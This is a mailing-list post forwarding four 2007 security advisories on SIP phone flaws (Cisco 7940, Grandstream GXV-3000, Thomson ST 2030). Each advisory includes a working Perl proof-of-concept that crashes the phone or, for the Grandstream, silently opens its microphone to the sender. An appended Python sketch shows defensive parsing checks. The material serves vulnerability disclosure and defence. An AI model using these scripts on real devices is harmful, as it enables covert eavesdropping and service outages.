Of possible interest. These are recent posts to the "full-disclosure" list.
There are four posts forwarded below.
=JeffH
------- Forwarded Messages
From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Mon, 20 Aug 2007 15:57:44 +0200
Subject: [Full-disclosure] 3 messages attack remote DOS on Cisco 7940
MADYNES Security Advisory : stateful SIP remote DOS on Cisco 7940
Date of Discovery 3 February, 2007
ID: KIPH5
Synopsis
After sending a series of three SIP messages the device reboots. The phone
does not properly check the state engine in its SIP stack.
The vendor was informed in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.
Background
* SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalling. SIP is ASCII based; an INVITE message is used to initiate and
maintain a communication session.
Affected devices: Cisco phone 7940 (maybe others also) running firmware
P0S3-08-6-00
Impact
A malicious user can remotely crash the device and perform a denial of service
attack by sending three crafted SIP messages.
Resolution
Fixed software will be available from the vendor, and customers following
recommended best practices (i.e. segregating VoIP traffic from data) will be
protected from malicious traffic in most situations.
Credits
* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH
Configuration of our device:
* Current Firmware : P0S3-08-6-00
* IP-Address obtained by DHCP as 192.168.1.8
* User Name: 7940-1
Vulnerability:
It is based on a sequence of messages; none of the individual messages does
any harm by itself, but together they put the device into an inconsistent
state. The sequence is like:
X ------------------------- INVITE -----------------------> Cisco
X <--- 481 transaction does not exist ----- Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------------- OK ------------------------- Cisco
X <--- 481 transaction does not exist ----- Cisco
X ------------------------- OPTIONS--------------------> Cisco
And the device reboots.
The INVITE sent has the particularity that the remote tag is already filled.
The following two OPTIONS messages must have the same Call-ID as the
INVITE, and the CSeq number must increment; otherwise the test does not work.
Exploit:
To run the exploit, the file stateful-cisco-8.6.pl should be launched
(assuming our configuration) as:
perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1
The script is simple and does not check which messages are received; it
just waits a second before sending the next one.
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket = IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom:
<sip:[EMAIL PROTECTED]>;tag=00\r\nTo:
<sip:[EMAIL PROTECTED]>;tag=00\r\nCall-ID: [EMAIL PROTECTED]: 10
INVITE\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=01\r\nFrom:
<sip:[EMAIL PROTECTED]>;tag=01\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nCall-ID: [EMAIL PROTECTED]: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=02\r\nFrom:
<sip:[EMAIL PROTECTED]>;tag=02\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nCall-ID: [EMAIL PROTECTED]: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------- Message 2
From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Mon, 20 Aug 2007 16:04:05 +0200
Subject: [Full-disclosure] 10 messages SIP Remote DOS on Cisco 7940 SIP Phone
MADYNES Security Advisory : stateful SIP remote DOS on Cisco 7940
Date of Discovery 4 April, 2007
ID: KIPH6
Synopsis
After sending a series of ten SIP messages the device reboots. The phone
does not properly check the state engine in its SIP stack.
The vendor was informed in April 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.
Background
* SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalling. SIP is ASCII based; an INVITE message is used to initiate and
maintain a communication session.
Affected devices: Cisco phone 7940 (maybe others also) running firmware
P0S3-08-6-00
Impact:
A malicious user can remotely crash the device and perform a denial of service
attack by sending ten crafted SIP messages.
Resolution
Fixed software will be available from the vendor, and customers following
recommended best practices (i.e. segregating VoIP traffic from data) will be
protected from malicious traffic in most situations.
Credits
* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH
Configuration of our device:
* Current Firmware : P0S3-08-6-00
* IP-Address obtained by DHCP as 192.168.1.8
* User Name: 7940-3
Vulnerability:
It is based on a sequence of 10 messages; none of the individual messages
does any harm by itself, but together they put the device into an
inconsistent state. The sequence is like:
X ------------------------- INVITE -----------------------> Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------- 200 OK ------------------------- Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------- 200 OK ------------------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X ------------------------- INVITE -----------------------> Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------- 404 Not Found ------------------ Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X <--------------- 400 Bad Request --------------- Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------- 200 OK ------------------------- Cisco
X ------------------------- INVITE -----------------------> Cisco
X <----------------100 Trying ------------------------- Cisco
X <--------------- 404 Not Found ------------------ Cisco
X <--------------- 404 Not Found ------------------ Cisco
X <--------------- 404 Not Found ------------------ Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------- 200 OK ------------------------- Cisco
X <--------------- 404 Not Found ------------------ Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------- 200 OK ------------------------- Cisco
X <--------------- 404 Not Found ------------------ Cisco
...
And the device reboots after a few seconds.
Exploit:
To run the exploit, the file stateful-cisco-8.6.pl should be launched
(assuming our configuration) as:
perl stateful-cisco-8.6-v2.pl 192.168.1.8 5060 7940-3 192.168.1.2
Approximately, it takes less than 2 minutes to reboot the device after the
script is launched.
The script is simple and does not check which messages are received; it
just waits some time before sending the next one.
POC Code
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless
($ARGV[3]);
$socket = IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];branch=01;rport\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=01\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nCall-ID: [EMAIL PROTECTED]: 7532
INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL,
REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length:
215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN
IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0
PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101
0-16\r\na=silenceSupp:off - - - -\r\n";
$socket->send($msg);
sleep(8.2);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=02\r\nCall-ID:
[EMAIL PROTECTED]: 79 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1.5);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=03\r\nCall-ID:
[EMAIL PROTECTED]: 15853 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(3.3);
$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=04\r\nCall-ID:
[EMAIL PROTECTED]: 36688 INVITE\r\nContent-Type:
application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY,
NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent:
Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253
1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0
0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98
speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0
PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101
telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n";
$socket->send($msg);
sleep(4);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=01\r\nCall-ID:
[EMAIL PROTECTED]: 21013 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(4);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=01\r\nCall-ID:
[EMAIL PROTECTED]: 18031 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(12);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=07\r\nCall-ID:
[EMAIL PROTECTED]: 41664 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(3);
$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];branch=02;rport\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=08\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nContact: <sip:[EMAIL PROTECTED]>\r\nCall-ID:
[EMAIL PROTECTED]: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE,
ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type:
application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4
192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024
RTP/AVP 0 3 8 97 101\r\na=rtpmap:0
PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97
spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101
0-16\r\na=silenceSupp:off - - - -\r\n";
$socket->send($msg);
sleep(3);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=09\r\nCall-ID:
[EMAIL PROTECTED]: 18883 OPTIONS\r\nAccept:
application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(3);
$msg = "OPTIONS sip:[EMAIL PROTECTED] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:[EMAIL PROTECTED]>\r\nFrom: <sip:[EMAIL PROTECTED]>;tag=10\r\nCall-ID:
[EMAIL PROTECTED]: 6298 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
------- Message 3
From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Wed, 22 Aug 2007 15:18:37 +0200
Subject: [Full-disclosure] Remote eavesdropping with SIP Phone GXV-3000
While playing with the SIP Madynes stateful fuzzer (for a description see
http://hal.inria.fr/inria-00166947/en), we have realized that some SIP stack
engines have serious bugs that allow an attacker to automatically make a
remote phone accept a call without ringing and without asking the user to
take the phone off the hook, such that the attacker might be able to listen
to all conversations that take place in the remote room without being noticed.
One example that we can disclose (the vendor was notified on 10th May 2007)
is the following: Grandstream SIP Phone GXV-3000
MADYNES Security Advisory : SIP remote attack on Grandstream SIP Phone
GXV-3000
Date of Discovery 7th May, 2007
ID: KIPH7
Background
SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalling. SIP is ASCII based; an INVITE message is used to initiate and
maintain a communication session.
Affected devices: Grandstream SIP Phone GXV-3000 with latest available
firmware 1.0.1.7, Loader 1.0.0.6, Boot 1.0.0.18
Impact:
A malicious user can remotely eavesdrop (from a remote location) and perform a
DoS on a remote phone.
Resolution
Fixed software will be available from the vendor, and customers following
recommended best practices (i.e. segregating VoIP traffic from data) will be
protected from malicious traffic in most situations.
The vulnerability is based on a sequence of two messages, where both
messages are syntactically correct, but together they put the device into an
inconsistent state, where the RTP is now sent to the attacker.
[EMAIL PROTECTED]:5060 is the attacker
[EMAIL PROTECTED]:5060 is the attacked phone
X ----------------------- INVITE ------------------->GXV-3000
X <------------------ 100 Trying ----------------- GXV-3000
X <--------------- 180 Ringing ------------------- GXV-3000
X ------------- 183 Session Progress -------> GXV-3000
X <-----------RTP - FLOW ------------------------ GXV-3000
After these messages the device is not able to hang up, so a remote DoS can
also be performed.
Credits:
* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)
Exploit Code:
To run the exploit, the file Grandstream-GXV3000.pl should be launched
(assuming our configuration) as:
perl Grandstream-GXV3000.pl 152.81.48.88 5060 humbol 152.81.48.94 5060 ougui
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);
$socket = IO::Socket::INET->new(
Proto=>'udp',
LocalPort => $ARGV[4],
PeerPort=>$ARGV[1],
PeerAddr=>$ARGV[0]);
$sdp= "v=0\r
o=username 0 0 IN IP4 $ARGV[3]\r
s=The Funky Flow\r
c=IN IP4 $ARGV[3]\r
t=0 0\r
m=audio 33404 RTP/AVP 3 97 0 8\r
a=rtpmap:0 PCMU/8000\r
a=rtpmap:3 GSM/8000\r
a=rtpmap:8 PCMA/8000\r
a=rtpmap:97 iLBC/8000\r
a=fmtp:97 mode=30\r\n";
$sdplen= length $sdp;
$msg= "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:[EMAIL PROTECTED]>\r
To: <sip:[EMAIL PROTECTED]>\r
Contact: <sip:[EMAIL PROTECTED]>\r
Call-ID: [EMAIL PROTECTED]
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
sleep(3);
$msg=
"SIP/2.0 183 Session Progress\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:[EMAIL PROTECTED]>\r
To: <sip:[EMAIL PROTECTED]>\r
Call-ID: [EMAIL PROTECTED]
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Contact: <sip:[EMAIL PROTECTED]>\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
------- Message 4
From: "Radu State" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Date: Thu, 23 Aug 2007 18:16:33 +0200
Subject: [Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030
using the VIA Header
MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030
Date of Discovery 15 February, 2007
Vendor was notified on 1 March 2007
ID: KIPH8
Synopsis
After sending a message in which the space after the SIP version in the Via
header is replaced by a slash, the device looks functional but in fact does
not respond to any event, provoking a DoS.
Background
SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalling. SIP is ASCII based; an INVITE message is used to initiate and
maintain a communication session.
Affected devices: Thomson SIP phone ST 2030
Impact:
A malicious user can remotely crash the device and perform a denial of service
attack by sending one crafted SIP message.
Resolution
Fixed software will be available from the vendor, and customers following
recommended best practices (i.e. segregating VoIP traffic from data) will be
protected from malicious traffic in most situations.
Credits
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en).
Configuration of our device:
Software Version: v1.52.1
IP-Address obtained by DHCP as 192.168.1.106
User name : thomson
To run the exploit, the file thomson-2030-3.pl should be launched (assuming
our configuration) as:
perl thomson-2030-3.pl 192.168.1.106 5060 thomson
POC Code:
#!/usr/bin/perl
#Vulnerability for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket = IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r\nVia:
SIP/2.0/UDP\\192.168.1.2;branch=00\r\nFrom: Caripe
<sip:[EMAIL PROTECTED]>;tag=00\r\nTo:
<sip:[EMAIL PROTECTED]>;tag=00\r\nCall-ID: [EMAIL PROTECTED]: 2
INVITE\r\n\r\n";
$socket->send($msg);
------- End of Forwarded Messages
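As an added example (not code from the advisories or from the MADYNES team), the following Python sketches the checks a phone's SIP stack should apply so that the message shapes in the four advisories above are handled without leaving the stack in an inconsistent state: a Via whose sent-protocol is not followed by whitespace is rejected (the KIPH8 shape), a response that matches no client transaction is discarded (the KIPH7 183), and a request whose To tag names no known dialog is answered with 481 and creates no state, so the follow-up OPTIONS with the same Call-ID and higher CSeq is treated as an ordinary out-of-dialog request (the KIPH5/KIPH6 shape). Addresses, Call-IDs and branch values are constructed placeholders; the `SipGuard` class and its helpers are assumptions of this example.

```python
import re

# Constructed checks for an endpoint's SIP stack; the traffic below uses placeholder addresses.
# RFC 3261 Via: "SIP/2.0/" transport, linear whitespace, sent-by host[:port], then ;params.
VIA_RE = re.compile(r"^SIP/2\.0/[A-Za-z]+[ \t]+[A-Za-z0-9.\-:\[\]]+(;[^\s;]+)*$")

def parse(raw):  # -> (start line, {lower-cased header name: [values]})
    lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def param(value, name):  # ;name=value parameter of a header value, or None
    m = re.search(r";%s=([^;\s]+)" % name, value)
    return m.group(1) if m else None

class SipGuard:
    def __init__(self):
        self.client_tx = set()  # (top Via branch, CSeq) of requests this endpoint sent
        self.dialogs = set()    # (Call-ID, local tag, remote tag) of established dialogs
    def sent_request(self, raw):
        _, h = parse(raw)
        self.client_tx.add((param(h["via"][0], "branch"), h["cseq"][0]))
    def check(self, raw):
        start, h = parse(raw)
        for via in h.get("via", []):      # KIPH8 shape: wrong separator after SIP/2.0/UDP
            if not VIA_RE.match(via):
                return "reject: malformed Via"
        if start.startswith("SIP/2.0 "):  # response: keep only if it matches a client transaction (RFC 3261 17.1.3)
            key = (param(h["via"][0], "branch"), h["cseq"][0])
            return "accept" if key in self.client_tx else "drop: no client transaction"
        to_tag = param(h["to"][0], "tag")
        if to_tag is not None:            # KIPH5 shape: INVITE with the remote tag pre-filled
            key = (h["call-id"][0], to_tag, param(h["from"][0], "tag"))
            if key not in self.dialogs:   # unknown dialog: answer 481 and create no state
                return "481 Call/Transaction Does Not Exist"
        return "accept"

def msg(start, via, cid, cseq, to_tag=""):  # minimal SIP message with CRLF line ends
    hdrs = ["Via: " + via, "From: <sip:a@10.0.0.2>;tag=00", "To: <sip:bob@phone.example>" + to_tag]
    return "\r\n".join([start] + hdrs + ["Call-ID: " + cid, "CSeq: " + cseq, "Content-Length: 0", "", ""])

INV, OPT = "INVITE sip:bob@phone.example SIP/2.0", "OPTIONS sip:bob@phone.example SIP/2.0"
BAD_VIA = msg(INV, "SIP/2.0/UDP\\10.0.0.2;branch=z9hG4bK00", "c1", "2 INVITE")
OUR_INVITE = msg(INV, "SIP/2.0/UDP 10.0.0.2;branch=z9hG4bK01", "c2", "10419 INVITE")
A_183 = msg("SIP/2.0 183 Session Progress", "SIP/2.0/UDP 10.0.0.2;branch=z9hG4bK01;rport=5060", "c2", "10419 INVITE")
TAGGED_INVITE = msg(INV, "SIP/2.0/UDP\t10.0.0.2;rport;branch=z9hG4bK02", "c3", "10 INVITE", ";tag=00")
FOLLOWUP = msg(OPT, "SIP/2.0/UDP 10.0.0.2;rport;branch=z9hG4bK03", "c3", "11 OPTIONS")

def run_demo():
    g, out = SipGuard(), {}
    out["bad_via"], out["stray_183"] = g.check(BAD_VIA), g.check(A_183)
    g.sent_request(OUR_INVITE)            # now the same 183 answers a transaction we opened
    out["matched_183"], out["tagged_invite"] = g.check(A_183), g.check(TAGGED_INVITE)
    out["followup"] = g.check(FOLLOWUP)   # same Call-ID, higher CSeq, no To tag: ordinary request
    return dict(out, dialogs_created=len(g.dialogs))

print(run_demo())
```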
_______________________________________________
Sip-implementors mailing list
[email protected]
https://lists.cs.columbia.edu/cucslists/listinfo/sip-implementors